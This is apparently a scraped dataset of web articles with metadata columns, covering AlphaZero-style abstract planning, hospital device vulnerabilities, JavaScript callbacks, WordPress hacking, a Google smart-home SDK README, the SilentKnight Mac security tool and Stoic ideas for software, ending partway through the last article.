How does this ability to think in the abstract translate to decision-making in the real world? Humans do this all the time. As I write this, I am at my computer desk in my apartment. If the fire alarm were to go off, indicating that I should leave the building, my instinct is to head towards my apartment door and go down the hall to the stairs, which will then bring me outside. By contrast, a robot might start planning one step at a time, expending enormous computational effort to decide whether walking should begin with the left or right foot, a decision has little bearing on the overall solution.
For a robot, the planning problem becomes even more complicated when it finds itself in an unfamiliar building. The robot can no longer compute a precise plan, since planning a collision-free trajectory is effectively impossible when the locations of all the obstacles are unknown. Humans are capable of overcoming the computational issues that hold back machines because we think in the abstract. I know that bathrooms are likely to be dead ends, while hallways usually are not. If my goal is to leave the building, entering a bathroom is probably unwise.
So how can we encourage a system like AlphaZero to think in terms of these human-like abstract actions?
Understanding how to marry abstract decision-making and AlphaZero requires looking at how AlphaZero works. To make decisions, AlphaZero needs to be able to forward simulate the game: it knows exactly what the board will look like after it makes a move, and what the game will look like after the opponent makes their move, and so on.
For games like Chess and Go, expanding this tree of moves is trivial. In the real world, however, this same process is extremely difficult, even for an AI. If you don’t believe me, take a look at some of the recent progress in video frame prediction, which aims to predict the most likely next few frames of a video. The results are often *pretty reasonable*, but are often oddly pixelated and are (for now) easily distinguishable from real video. In this problem, the machine learning algorithm has a pretty tough time making predictions more than a few frames into the future. Imagine instead that the robot were to try to predict the likelihood of *every possible future video frame* for hundreds of frames into the future. The problem is so complex that even generating the data we would need to train such an algorithm is hopelessly difficult.
If we instead use an abstract model of the world, imagining the future becomes much easier. I no longer care *exactly* what the world looks like, but instead try to make predictions about the *types of things* that can happen. In the context of my *building exit problem*, I should not have to imagine what color tile a bathroom has or precisely how large it is to understand that if I enter a bathroom while trying to leave a building, I will likely have to turn around and exit it again first.
Framed this way, abstractions allow us to represent the world as if it were a chess board: the *moves* correspond to physically moving between rooms or hallways or leaving the building. Equipped with an abstract model of the world, a system like AlphaZero can learn to predict how the world will evolve in terms of these abstract concepts. Using this abstract model of the world to make decisions is therefore relatively straightforward for a system like AlphaZero: the number of actions (and subsequent outcomes) is vastly reduced, allowing us to use familiar strategies for decision-making.
There are still practical challenges associated with using abstractions during planning that have thus far limited AI, like AlphaZero, from using them in general. I discuss these later.
There are still practical challenges associated with using abstractions during planning that have thus far limited AI, like AlphaZero, from using them in general. I discuss these later.
In fact *using* abstract models for planning is often much simpler then *creating* abstract models. So where do abstract models come from?
*Disclaimer*: This section contains work my colleagues and I have done. While our work does not realize an *AlphaZero for the real world*, we present ideas that are useful for understanding how one might construct such a system.
*Disclaimer*: This section contains work my colleagues and I have done. While our work does not realize an *AlphaZero for the real world*, we present ideas that are useful for understanding how one might construct such a system.
To begin to answer this question, we can limit the scope of our inquiry to a simpler problem: navigation in an unknown environment. Imagine that a robot is placed in the middle of a university building and capable of detecting the local geometry of the environment: i.e. walls and obstacles. The robot’s (albeit simple) goal is to reach a point that’s roughly 100 meters away in a part of the building it cannot see.
When faced with this task, what does a simple algorithm do? Most robots avoid the difficulties associated with making predictions about the unknown part of the building by ignoring it. The robot plans as if all unknown space is free space. Naturally, this assumption is a poor one. A robot using this strategy to navigate constantly enters people’s offices in an effort to reach the goal only to “discover” that many of these were dead ends. It often needs to retrace its steps and return to the hallway before it can make further progress towards the goal. This video shows a simulated robot doing just that:
Instead of planning like this, we would like to develop an abstract representation of the world so that the robot can make better decisions. As the robot builds its map of the world, boundaries between free space and unknown space appear whenever part of the map is occluded by obstacles or walls. We use each one of these boundaries, or *frontiers*, to represent an abstract action: an action consists of the robot traveling to the selected boundary and exploring the unknown space beyond it in an effort to reach the goal. In our model, there are two possible “outcomes” from executing an action: (1) we reach the goal and planning terminates, or (2) we fail to reach the goal and must select a different action.
Using machine learning, we estimate the likelihood that each boundary leads to the goal, which allows us to better estimate how expensive each move will be. Deciding which action to take involves a tree search procedure similar to that of AlphaZero, we simulate trying each action and its possible outcomes in sequence and select the action that has the lowest expected cost. On a toy example, the procedure looks something like this:
This procedure allows us to use our abstract model of the world for planning. Using our procedure, in combination with the learned probability that each boundary leads to the goal, our simulated robot reaches the goal much more quickly than in the example above:
As we try to deploy robots and AI systems to solve complex, real-world problems, it has become increasingly clear that our machine learning algorithms can benefit from being designed so that they mirror the structure of the problem they are tasked to solve. Humans are extremely good at using structure to solve problems:
Humans’ capacity for combinatorial generalization depends critically on our cognitive mechanisms for representing structure and reasoning about relations. We represent complex systems as compositions of entities and their interactions, such as judging whether a haphazard stack of objects is stable. We use hierarchies to abstract away from fine-grained differences, and capture more general commonalities between representations and behaviors, such as parts of an object, objects in a scene, neighborhoods in a town, and towns in a country. We solve novel problems by composing familiar skills and routines […] When learning, we either fit new knowledge into our existing structured representations, or adjust the structure itself to better accommodate (and make use of) the new and the old.
In the previous section, we developed an abstract model of the world specifically tailored to solving a single problem. While our model — which uses boundaries between free space and the unknown to define abstract actions — is effective for the task of navigation, it would certainly be useless if the robot were instead commanded to *clean the dishes*. It remains an open question how to construct an artificial agent that can “adjust the structure itself to better accommodate” new data or tasks.
While our work is certainly a practical step towards realizing an *AlphaZero for the real world*, we still have a lot to learn. Where do good abstractions come from? What makes one abstraction better than another? How can abstractions be learned?
As always, I welcome discussion in the comments below or on Hacker News. Feel free to ask questions, share your thoughts, or let me know of some research you would like to share.
I would also like to extend my thanks to my coauthor Chris Bradley and the members of the Robust Robotics Group at MIT, who provided constructive feedback on this article. | true | true | true | Using DeepMind's AlphaZero AI to solve real problems will require a change in the way computers represent and think about the world. In this post, we discuss how abstract models of the world can be used for better AI decision making and discuss recent work of ours that proposes such a model for the task of navigation. | 2024-10-12 00:00:00 | 2018-12-16 00:00:00 | website | cachestocaches.com | GregoryJStein | null | null |
|
30,001,592 | https://www.theverge.com/2022/1/19/22891440/internet-connected-medical-devices-vulnerable | Half of internet-connected devices in hospitals are vulnerable to hacks, report finds | Nicole Wetsman | Over half of internet-connected devices used in hospitals have a vulnerability that could put patient safety, confidential data, or the usability of a device at risk, according to a new report from the healthcare cybersecurity company Cynerio.
The report analyzed data from over 10 million devices at over 300 hospitals and health care facilities globally, which the company collected through connectors attached to the devices as part of its security platform.
The most common type of internet-connected device in hospitals was an infusion pump. These devices can remotely connect to electronic medical records, pull the correct dosage of a medication or other fluid, and dispense it to the patient. Infusion pumps were also the devices most likely to have vulnerabilities that could be exploited by hackers, the report found — 73 percent had a vulnerability. Experts worry that hacks into devices like these, which are directly connected to patients, could be used to hurt or threaten to hurt people directly. Someone could theoretically access those systems and change the dosage of a medication, for example.
Other common internet-connected devices are patient monitors, which can track things like heart rate and breathing rate, and ultrasounds. Both of those types of devices were in the top 10 list in terms of numbers of vulnerabilities.
Health care organizations are now a major target for hackers, and while a direct attack on internet-connected medical devices doesn’t seem to have happened yet, experts think it’s a possibility. The more active threat is from groups that break into hospital systems through a vulnerable device and lock up the hospital’s digital networks — leaving doctors and nurses unable to access medical records, devices, and other digital tools — and demand a ransom to unlock them. These attacks have escalated over the past few years, and they slow down hospital functions to the extent that it can hurt patients.
Cynerio’s report notes that most of the vulnerabilities in medical devices are easily fixable: they’re due to weak or default passwords or a recall notice that the organization hasn’t acted on. Many healthcare organizations just don’t have the resources or personnel to keep systems up to date and might not know if there’s an update or alert concerning one of their devices.
But reports like this one, combined with the growing frequency of ransomware attacks, is pushing more health care organizations to invest in cybersecurity, experts say. “I think this is reaching a level of criticality that is getting the attention of CEOs and board rooms,” Ed Gaudet, CEO and founder at cybersecurity company Censinet, told *The Verge* this fall. | true | true | true | IV pumps, ultrasounds, and monitors were at risk. | 2024-10-12 00:00:00 | 2022-01-19 00:00:00 | article | theverge.com | The Verge | null | null |
|
12,798,063 | http://inhabitat.com/this-uk-supercomputer-can-predict-winter-weather-a-year-ahead/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
26,217,280 | https://www.youtube.com/watch?v=_zvGdYMBnuI&ab_channel=Let%27sStartABusiness | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
12,280,585 | http://boxbase.org/entries/2016/aug/8/javascript-pyramids/ | Javascript continent and the callback pyramids of hell | Henri Tuhola | # Javascript continent and the callback pyramids of hell
I am not the first to write about these wonderful creations of the man. Some call them the Pyramids of doom. Thousands and thousands of small pyramids stand in the Javascript source code of popular web applications. Everyone has made at least two of them and they remain in their place. From time to time bypassing maintainers break their foot on them and rewrite some of pyramids into slightly smaller multiple pyramids. This is how they keep multiplying.
You can tell there's a callback pyramid growing from very simple cues:
`xxxxxx(xxxx, function(xxxxxxx) {`
`xxxxxx(function(xxxxxxx) {`
`}xxx, ).xxxxxx(xxx, function(xxxxxxx) {`
`xxxxxx(function(xxxxxxx) {`
`xxxxxx;`
`}, xxxxxxx);`
`});`
`});`
Many nested functions creep their way up, forming a tip, some of the largest sweeping the ceiling limit of 80 columns. Often they divide before they grow very large.
Doom pyramids feed with error handling code. To get what they yearn, they destroy the exception handling mechanism that would lead the errors where it is relevant to solve them. This forces programmers to constantly feed the pyramids with more error handling code, encouraging their growth.
## Origins
Origin of doom pyramid come from disruption of linear logic and restrictions on control flow constructs. They cannot thrive in environment where execution can wait for results or fail with ordinary means.
`xxxx = xxxxxxx(xxx, xxx, xx);`
`xxxxx(xxxx, xxx, xx);`
`xxxx = xxxxxxxxxx(xxx, xxx, xx).xxxx();`
`xxxx = xxxxxx.xxxx(xxx, xxx, xx);`
There is no concept of 'wait for results' in javascript, therefore ordinary programs ongo a violent conversion into continuation passing style as they evolve, turning into the dreaded doom pyramids.
Fear of damaging and uncontrolled concurrency that might occur from waiting makes the javascript a fertile breeding ground for different kinds of doom pyramids.
## Subspecies
As programmers try to fix the symptom and not the original problem, various subspecies of doom pyramids have formed. They take a shape as constructs that resemble their own languages.
These subspecies have their own advanced control flow constructs that allows them to live a life of their own. They fight with each others, including the javascript that they protrude from.
### Promises
Promises originated as recorded sentences of OOP evangelists. They were eventually rewritten into a complete language of their own that nearly resembles a whole interpreted language of its own.
Internally they contain an interpreter to represent sequential control flow, and inject more promises into promises to represent code that can do calls that wait for subsequent results. The interpreter-likeness makes the promises heavyweight, forming very interesting optimization problems to where they are used.
Lack of understanding that there's an unique language in place result in code that sometimes confusingly resemble doom pyramids themselves
Promises can be told apart by specific keywords they use to represent control flow:
`xxxxxx.xxxx(xxxxx, xxxx).then(function(xxx) {`
`return xxx.xxxx(xxxxxx);`
`}).then(function(xx) {`
`var xxxx = xx;`
`return xxxx.xxx()`
`}).catch(function(xxxx) {`
`xxxxxx(xxxx);`
`});`
Promises breed by providing a control flow constructs that can wait for results. Programmers see these shiny things and put them into good use, sometimes. This way the parasites themselves end up dragged long distances.
### Async/Await
Async and await is an advanced form of promises that became a true language that is a duplicate of the original with two new keywords and hidden, duplicated control flow constructs. Asyncs and awaits require a transpiler to function, but they slowly asphyxiate the original language from their way.
Async and await spreads by programmer's ignorance, cross-pollinating other languages that didn't have any problems to start with.
To avoid the original fear that concurrent execution would break atomicity constraints in existing programs. The Async and await produce an identical control flow system on top of the language it infects, with the difference that there are keywords 'async' and 'await' sprinkled around according to a rule.
`var xxxx = async function() {`
`var xxx = new XxxxXx();`
`var xxxx = await xxx.xxx_xxx();`
`return xxxx;`
`};`
This was from the book of "Javascript's parasites".
Here some other nice resources that may provoke a thought:
- A silly broad compiler question in the stackexchange.com
- Someone conjuring syntax design guidelines from his hat
- Collection of lisp fanboy quotes
Also, as always, there are lots of errors in this blog post. I think it's worthwhile to check into r/programming if you wonder about what's right and what's wrong. | true | true | true | null | 2024-10-12 00:00:00 | 2012-01-11 00:00:00 | website | boxbase.org | boxbase.org | null | null |
|
215,355 | http://www.techcrunch.com/2008/06/11/my-blog-was-hacked-is-yours-next-huge-wordpress-security-issues/ | Wordpress Security Issues Lead To Mass Hacking. Is Your Blog Next? | TechCrunch | Nik Cubrilovic | Due to its popularity as a blogging platform, WordPress has become a prime target for hackers looking to take over blogs for search-engine optimization (SEO) of other sites they control, traffic-redirection and other purposes. Recently there have been a spate of automated attacks which take advantage of recently discovered security vulnerabilities in WordPress.
To date, WordPress has been keeping up with the security holes by releasing updates within a few days of new exploits being found, but in the past few days new exploits have appeared that nobody seems to have answers for.
One such attack actually happened to me back in January, when I noticed that a blog I was hosting had been littered with tens of thousands of pages relating to pharmaceuticals and adult material. Someone had gotten access to the blog and literally created new pages, such as this one:
The blog was running the most recent version of WordPress available at the time, and I traced the entry-point back to a simple flaw in a script that was not adequately filtering user input. To its credit, WordPress released a new version that patched the vulnerability (among others) and asked its users to upgrade.
That was six months ago, but in May it happened again, this time with a new security hole and again it occurred a few days before WordPress was able to respond with an update. The problem is that most blog owners aren’t aware of the threat posed by hackers targeting blogs, as a successful attack may not tip off the blog owner in any way. The security vulnerabilities in WordPress have led to automated attacks across a very large number of blogs, often without site owners realizing what is happening.
**If you are currently not running the ****latest version of WordPress then there is a very high chance that your site has already been compromised.**
The common results of a successful attack are that a backdoor is installed (meaning the hacker can go back in and enter your blog at a later date), passwords for all users are downloaded, or spam pages are generated. At that point, you are no longer in complete control of your blog, including all the content and anything else in the same database that the WordPress install has access to.
Hackers are taking advantage of the open-source nature of the software to analyze the source code and test it for potential vulnerabilities. It is then left up to developers and users to detect, track down, and then close off the vulnerabilities in the code that attackers are using. The pattern seems to be that when a new hole is found, it is broadly exploited, then developers rush out a patch and a new release. Thankfully most of the damage inflicted by the automated exploits can be reversed with an upgrade, though in some cases you can be left with thousands of pages and images to clean up (and they are usually well hidden).
For users of WordPress, backups are essential, as are frequent updates, monitoring your blog usage and tracking the official WordPress blog and other blogs for news of any new security holes. There are also plenty of guides and applications available that can assist a site owner in further securing their blog.
It is unknown just how many WordPress blogs are infected (I have seen instances of double infection, where a previously hacked host had been hacked again), but as an indicator, across the ten or more WordPress blogs that TechCrunch and I have access to, we can see over 100 requests daily for these various security holes. Stories about hacked blogs are becoming more and more <a href="http://blogsearch.google.com/blogsearch?hl=en&q=wordpress hacked&ie=UTF-8&scoring=d" common and the ongoing concern is that the newest security hole could be found and exploited at any moment.
**Update**: In the comments, Anil Dash from Six Apart has linked to a post on their blog about MovableType vs WordPress in terms of security. | true | true | true | Due to its popularity as a blogging platform, Wordpress has become a prime target for hackers looking to take over blogs for search-engine optimization | 2024-10-12 00:00:00 | 2008-06-11 00:00:00 | article | techcrunch.com | TechCrunch | null | null |
|
694,312 | http://news.duke.edu/2009/06/phonepoint.html | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
21,291,812 | https://github.com/actions-on-google/smart-home-local | GitHub - google-home/smart-home-local: Local Home SDK sample | Google-Home | This sample demonstrates integrating a smart home Action with the Local Home SDK. The Local Home SDK allow developers to add a local path to handle smart home intents by running TypeScript (or JavaScript) directly on Google Home smart speakers and Nest smart displays. The sample supports the following protocols along with the companion virtual device:
**Device Discovery:**UDP, mDNS or UPnP**Control:**UDP, TCP, or HTTP
- Node.js LTS 10.16.0+
- Firebase CLI
Note: This project uses Cloud Functions for Firebase, which requires you to associate a billing account with your project. Actions projects do not create a billing account by default. See Create a new billing account for more information.
- Create a new
*Smart Home*project in the Actions console - Deploy the placeholder smart home provider to
*Cloud Functions for Firebase*using the same Project ID:`npm install --prefix functions/ npm run firebase --prefix functions/ -- use ${PROJECT_ID} npm run deploy --prefix functions/`
- In
*Develop > Actions*, set the following configuration values that matches the*Cloud Functions for Firebase*deployment:**Fulfillment**:`https://${REGION}-${PROJECT_ID}.cloudfunctions.net/smarthome`
- In
*Develop > Account linking*, set the following configuration values:**Client ID**::`placeholder-client-id`
**Client secret**:`placeholder-client-secret`
**Authorization URL**:`https://${REGION}-${PROJECT_ID}.cloudfunctions.net/authorize`
**Token URL**:`https://${REGION}-${PROJECT_ID}.cloudfunctions.net/token`
- Click
*Save*
Choose one of the supported the discovery protocols that you would like to test, and create a new scan configuration in the Actions console.
Note: These are the default values used by the virtual device for discovery. If you choose to use different values, you will need to supply those parameters when you set up the virtual device.
- In
*Develop > Actions > Configure local home SDK > Add device scan configuration*, Click in**New scan config**.
**Broadcast address**:`255.255.255.255`
**Discovery packet**:`A5A5A5A5`
**Listen port**:`3312`
**Broadcast port**:`3311`
-
**mDNS service name**:`_sample._tcp.local`
-
**Name**:`.*\._sample\._tcp\.local`
Note: The
**Name**attribute value is a regular expression.
-
**UPNP service type**:`urn:sample:service:light:1`
-
Click
*Save*
Choose one of the supported control protocols that you would like to test. You will use this value to configure both the cloud fulfillment and the virtual device.
`UDP`
: Send execution commands to the target device as a UDP payload.`TCP`
: Send execution commands to the target device as a TCP payload.`HTTP`
: Send execution commands to the target device as an HTTP request.
The local fulfillment sample supports running as a **single end device** or a
**hub/proxy device**. This is determined by the number of channels you configure.
A device with more than one channel will be treated as a hub by the local
fulfillment sample code.
Configure the cloud service to report the correct device `SYNC`
metadata based on your
chosen device type and control protocol. Here are some examples for configuring the service for different use cases:
-
Report a single device (
`strand1`
) controlled via UDP commands:`npm run firebase --prefix functions/ -- functions:config:set \ strand1.leds=16 strand1.channel=1 \ strand1.control_protocol=UDP npm run deploy --prefix functions/`
-
Report three individual light strands connected through a proxy (
`hub1`
) and controlled via HTTP commands:`npm run firebase --prefix functions/ -- functions:config:set \ hub1.leds=16 hub1.channel=1,2,3 \ hub1.control_protocol=HTTP npm run deploy --prefix functions/`
The companion virtual device is a Node.js app that emulates strands of RGB LEDs controllable using the Open Pixel Control protocol and displays the results to the terminal in a colorful way.
- Virtual device discovery settings must match the attributes provided in
**Device Scan Configuration**in*Develop > Actions > Configure local home SDK*.- If you modify the attributes in your
**Device Scan Configuration**, you must configure the virtual device accordingly. See the virtual device README for more details on configuring the discovery attributes.
- If you modify the attributes in your
- Virtual device control protocol should match
`control_protocol`
used with`functions:config:set`
when setting up cloud fulfillment. - Configure the device type as
**end device**or**hub/proxy**based on the number of`--channel`
parameters provided. A device with more than one channel will be treated as a hub.
Note: The virtual device needs to listen on the same local network as the Home device.
Here are some examples for configuring the virtual device for different use cases:
-
Start the virtual device as a single device (
`strand1`
) discovered via UDP broadcast and controlled with UDP commands:`npm install --prefix device/ npm start --prefix device/ -- \ --device_id strand1 \ --discovery_protocol UDP \ --control_protocol UDP \ --channel 1`
-
Start the virtual device as a hub (
`hub1`
) discovered via mDNS and controlling three individual strands with HTTP commands:`npm install --prefix device/ npm start --prefix device/ -- \ --device_id hub1 \ --discovery_protocol MDNS \ --control_protocol HTTP \ --channel 1 \ --channel 2 \ --channel 3`
Note: See the virtual device README for more details on the supported configuration options.
Serve the sample app locally from the same local network as the Home device, or deploy it to a publicly reacheable URL endpoint.
-
Start the local development server:
`npm install --prefix app/ npm start --prefix app/`
Note: The local development server needs to listen on the same local network as the Home device in order to be able to load the Local Home SDK application.
-
Go to the smart home project in the Actions console
-
In
*Develop > Actions > Configure local home SDK*- Set the
*testing URL for Chrome*to the one displayed in the local development server logs. - Set the
*testing URL for Node*to the one displayed in the local development server logs. - Under
*Add capabilities*- Check
*Support local query*.
- Check
- Set the
-
Click
*Save*
```
npm install --prefix app/
npm run build --prefix app/
npm run deploy --prefix app/ -- --project ${FIREBASE_PROJECT_ID}
```
- Go to the smart home project in the Actions console
- In
*Develop > Actions > Configure local home SDK*- Set the
*testing URL for Chrome*to:`http://${FIREBASE_PROJECT_ID}.firebaseapp.com/web/index.html`
- Set the
*testing URL for Node*to:`http://${FIREBASE_PROJECT_ID}.firebaseapp.com/node/bundle.js`
- Under
*Add capabilities*- Check
*Support local query*.
- Check
- Set the
- Click
*Save*
- In
*Develop > Invocation*, set the*Display name*for the smart home Action. - In
*Test*, click*Start testing* - In the
*Google Home app*- Click the '+' sign
- Select
*Work with Google* - In the list of providers, select your smart home Action by
*Display name*prefixed with`[test]`
- Click
*Link* - Click
*Complete Account Link*
- Select the linked devices and click on
*Add to a room*. - Reboot the Google Home Device
- Open
`chrome://inspect`
- Locate the Local Home SDK application and click
`inspect`
to launch the Chrome developer tools. - Try the following query
`Set the light color to magenta`
- It should display the light strand(s) in a colorful way:
`◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉`
- Make sure the Google Home device, the virtual device and your workstation are on the same network.
- Make sure to disable any firewall running on your workstation.
```
npm test --prefix app/
npm run lint --prefix device/
```
See `LICENSE` | true | true | true | Local Home SDK sample. Contribute to google-home/smart-home-local development by creating an account on GitHub. | 2024-10-12 00:00:00 | 2019-07-08 00:00:00 | https://opengraph.githubassets.com/96f47d0fddcd5804dcb600fc2c7bf6c88ee653cdc42c1135670b3bf6b8cc0cbd/google-home/smart-home-local | object | github.com | GitHub | null | null |
37,456,058 | https://eclecticlight.co/2023/09/08/inside-silentknight-how-it-works/ | Inside SilentKnight: how it works | Hoakley | SilentKnight is intended to:
- check that your Mac has the current firmware,
- check that its security protection is current and hasn’t fallen behind,
- screen for major security issues, and warn you of them,
- make it easier to keep your Mac’s security data up to date.
This article explains how it does those.
**Opening checks**
When you first open the app, it may check whether it’s the current version by looking that up on my GitHub page. It only does this once a day, and if you prefer you can disable that in Settings.
It then starts checking the information to be displayed in its window. This involves inspecting version numbers of installed security data, fetching information from macOS, and checking its own records in its preference file as to when updates were last installed. To see whether versions are current, it accesses two files on my GitHub: one lists the current version numbers of security data and other files, the other contains firmware versions for different models of Mac.
If your Mac is running Catalina or later, the app also checks its log to obtain all scan reports from XProtect Remediator (XPR) in the last 24 hours, using the predicate
`/usr/bin/log show --predicate subsystem == "com.apple.XProtectFramework.PluginAPI" AND category == "XPEvent.structured" --info --last 1d`
You can disable that check if you wish.
At the same time, SilentKnight uses the `softwareupdate`
command tool to check whether any updates are available from Apple for that Mac, another feature you can disable if you wish. The command it uses is
`softwareupdate -l --include-config-data`
All this information is assembled in the app’s window for you to see. If there are updates available, the app will normally display its button to **Install All Updates**, another behaviour you can change in its Settings, as explained at the end.
**Updates**
This is an example taken from an Intel MacBook Pro that hadn’t been used for some weeks, and had fallen behind with its updates. Settings used are the standard, with **Download and install** and the **Install All Updates** checkbox ticked.
This shows both XProtect and XPR are out of date and need to be updated, and there were no XPR scans in the last 24 hours, as the Mac was shut down for the whole of that time.
Available updates include a mixture of two security updates, that will bring XProtect and XPR up to date, and two large macOS updates, either to macOS 12.6.1 or 13.0. Although I was going to upgrade this Mac to Ventura anyway, I’d much prefer to do that using Software Update with its progress bar and other aids. So what I wanted was to download and install just those two security updates. To do that, I opened the SilentKnight Updater window using the **Install Named Update…** command in the File menu, which lets me download and install each update individually.
Look carefully at each entry in the list of available updates, and they consist of a first line like
`* Label: XProtectPayloads_10_15-83`
followed by a line giving title, size, and other information including whether installing that update restarts your Mac.
To install a named update, select the name given after **Label**, here `XProtectPayloads_10_15-83`
, copy that, and paste it into the box labelled **Name of update** in the SilentKnight Updater window. Then click on the **Install Named Update** button, and SilentKnight will run a command like
`softwareupdate -i --include-config-data XProtectPayloads_10_15-83`
to download and install that named update. It then tells you what it has done, and here has successfully downloaded and installed that update. Repeat that with any other updates you want to download and install.
Normally, when you use the **Install All Updates** button, once the updates are complete SilentKnight automatically checks the versions again so you can be confident that it has worked properly and your Mac really is up to date. Because I used **Install Named Update** instead, I need to run that check manually by clicking on the **Check** button at the top of SilentKnight’s window.
The two red Xes have now gone, as the updates worked. Because XPR scans aren’t checked a second time, that information hasn’t changed. The information in the **Latest updates installed** now shows the most recent updates, and the other updates are still listed as being available.
If I don’t want to install any more updates, all I have to do now is quit SilentKnight. When I next open it, it will go through exactly the same sequence of checks, and no doubt still report that updates to 12.6.1 and 13.0 are available if I want them. But that’s my choice, and when I did upgrade that Mac to Ventura, I used Software Update rather than SilentKnight.
#### Security checks
SilentKnight is designed to draw your attention to any potential problems in the settings that it checks. Those are most extensive on Apple silicon Macs, but still cover the essentials on Intel models, particularly those with a T2 chip.
Here they include whether:
- Platform Security is full, which is broken down by Secure Boot, System Integrity Protection (SIP), the Signed System Volume (SSV) and others in the text below. If your Mac is using a language other than English, you may need to refer to the text below, as SilentKnight may be unable to tell from the localised results whether Platform Security is full;
- XProtect/Gatekeeper checks are enabled;
- FileVault is turned on.
**Settings**
To open its Settings window, use that command in the app’s SilentKnight menu. You’ll then see four settings:
- at the top, a radio button to choose between options for checking and download behaviour,
- a checkbox to set whether the Install All Updates button is shown or hidden,
- a checkbox to set whether to check XPR scans in the log,
- a checkbox to set whether to check for updates to SilentKnight itself.
Here are its standard settings, which you should use by default as they make life simpler.
The radio button selects how you want SilentKnight to check for and handle Apple’s updates:
**Don’t check**means that whenever you open the app it won’t check for Apple’s updates at all;**Download only**means that the app will check for updates with Apple, but when you choose to fetch them, they will only be downloaded and not installed. That allows you to choose which to install, but some of those downloaded updates may not install properly when obtained in this way. It adds to your work, and makes use more complicated, but it’s available if you prefer.**Download and install**means that when you click on the button to**Install All Updates**, SilentKnight will both download and install all available updates from Apple.
Note that SilentKnight *never* downloads or installs any updates automatically: you always have to tell it to do that by clicking on the button, or using a menu command. You remain in control.
It’s easy not to pay close attention to the list of updates available, and automatically click on the **Install All Updates** button. To help prevent you from doing that, you can set that button to be hidden by unchecking this checkbox. This doesn’t alter the behaviour set by the radio buttons, just determines whether that button is shown (ticked) or hidden (unchecked).
When you’ve made any changes in Settings that you want to stick, click on the **Set** button, then quit SilentKnight. Open it again, and open Settings to confirm that they’re set the way that you want. Although changing its settings doesn’t require quitting the app, that’s a good way to check that they should remain as you want them when you next use the app.
I hope this helps you get the most from SilentKnight. | true | true | true | How it checks whether your Mac’s firmware and security protection are current, and screens for major security issues. | 2024-10-12 00:00:00 | 2023-09-08 00:00:00 | article | eclecticlight.co | The Eclectic Light Company | null | null |
|
13,876,056 | https://spin.atomicobject.com/2017/03/14/stoic-wisdom-for-better-software/ | Ancient Stoic Wisdom for Writing Better Software | Jaime Lightfoot | My time at a software company has shown me how much focus there is on the new: new smartphone and laptop models, new revs, new development boards, new languages, and so on. But what about the old? I’m talking *really* old, like “two millennia before the Unix-Epoch” old.
The Stoic philosophers Zeno of Citium, Epictetus, and Seneca spoke at length about logic, control, and truth–all terms we discuss as programmers, but with very different meanings and applications. Still, Stoic works have lasted for thousands of years. What lessons do the ancient Greeks have for an industry with an obsession for the newest, latest thing?
*Via Negativa*–The Negative Way
“All philosophy lies in two words, sustain and abstain.” –Epictetus
*Via Negativa* is a Latin phrase usually associated with Christian theology, but it also describes a tenet of Stoic philosophy. It means removing what is bad or unnecessary in order to focus on what is good. Um, duh.
This seems completely obvious, yet it’s difficult to implement. We often look to fix problems (physical, financial, interpersonal, software, etc.) by positive action: adding more systems, rules, tracking, effort, and to-dos. This adds complication and leads to bugs, burnout, and failed New Year’s resolutions, but it’s familiar to us. The idea of fixing or improving things by *taking away* is counterintuitive and foreign to us.
What *via negativa* offers us is simplicity. A real-life example of adding vs. taking way might look like treating a medical condition by adding medication (*via positiva*), rather than removing stressors, possible allergens, etc. (*via negativa*). Adding medication might be beneficial, but it also adds a host of potential side effects, as well as hard-to-predict interaction with other medications. Of course, this is a simplified example (and I’m not a doctor), but the idea still holds: Our bias toward positive action and *adding* things to fix problems can add unforeseen complexity and consequences. Sound familiar?
The idea of *via negativa *doesn’t mean “do nothing.” Instead, it means striving toward simplicity and asking, **“What can I take away?”** So, how does this apply to software?
More lines of code mean more bugs. Conversely, “No code is faster than no code,” as posited by software blog Coding Horror and others.
The idea of simplicity crops up all over the place in software. Loose coupling in systems, called “orthogonality” in *The Pragmatic Programmer*, reduces dependency between different parts of a system. A push for reduced complexity is also seen in ideas like the Single Responsibility Principle and Separation of Concerns. The Don’t Repeat Yourself (or DRY) principle teaches that you should avoid duplication of logic, and that “every piece of knowledge must have a single, unambiguous, authoritative representation within a system.”
Most of us know that simplicity is a good idea: “less is more,” “keep it simple, stupid,” etc. Simple isn’t easy, though, as we have to be cognizant of our tendency toward positive action and *more*.
*Premeditation Malorum*–Negative Visualization
### (Literally, “premeditation of evils”)
“Begin each day by telling yourself: Today I shall be meeting with interference, ingratitude, insolence, disloyalty, ill-will, and selfishness–all of them due to the offenders’ ignorance of what is good or evil.” –Marcus Aurelius
The Stoics regularly thought, **“What’s the worst that could happen?”** This ranges from a daily expectation of meeting commonplace difficulty and vice, to contemplating personal catastrophes, even meditating on one’s own death. While this isn’t the kind of attitude that gets you invited to parties, the point is to be prepared, rather than surprised, if–or, let’s be honest–when bad things happen.
“What is quite unlooked for is more crushing in its effect, and unexpectedness adds to the weight of a disaster. The fact that it was unforeseen has never failed to intensify a person’s grief. This is a reason for ensuring that nothing ever takes us by surprise. We should project our thoughts ahead of us at every turn and have in mind every possible eventuality instead of only the usual course of events.” –Seneca,
Letters from a Stoic
To the Stoic philosopher Epictetus, such catastrophic events were were “dispreferred indifferent,” meaning that it would be better if they didn’t happen, but if they did, well…it wouldn’t be the end of the world, and it wouldn’t overwhelm one’s strength of character.
This idea is also taught in Cognitive Behavior Therapy as “de-catastrophizing.” Imagining things going wrong allows you to feel these emotions in advance, which takes some of the sting away if (or when) something bad happens. This creates psychological resilience.
## Can We Get Back to Software, Please?
Phew, heavy stuff. While this might be a little too “Eeyore” for most of us, especially given the inherent optimism of most developers, preparing for the worst (and hoping for the best) is an attitude that acknowledges the realities of our job. Schedules change, bugs crop up at the most inopportune times, and so on.
To be responsible consultants, we have to continually ask ourselves, **“What’s the worst that could happen–and how do I prepare for it?”**
Test-driven development is a huge part of our culture at Atomic. We have to test the “happy path” in our code, but we also test a myriad of different ways that things could go wrong. This isn’t an afterthought–we need to imagine these scenarios at the beginning of development and design our systems to support this testing. Forcing yourself to imagine what could go wrong at the outset means that you can write your code in such a way to gracefully handle all (or almost all) that could go wrong.
Likewise, we need a healthy dose of pessimism in our project planning. AO practices a “Fixed-Budget, Scope-Controlled” approach to working with clients. How do project and delivery leads account for hidden risks and things going wrong when estimating project scopes?
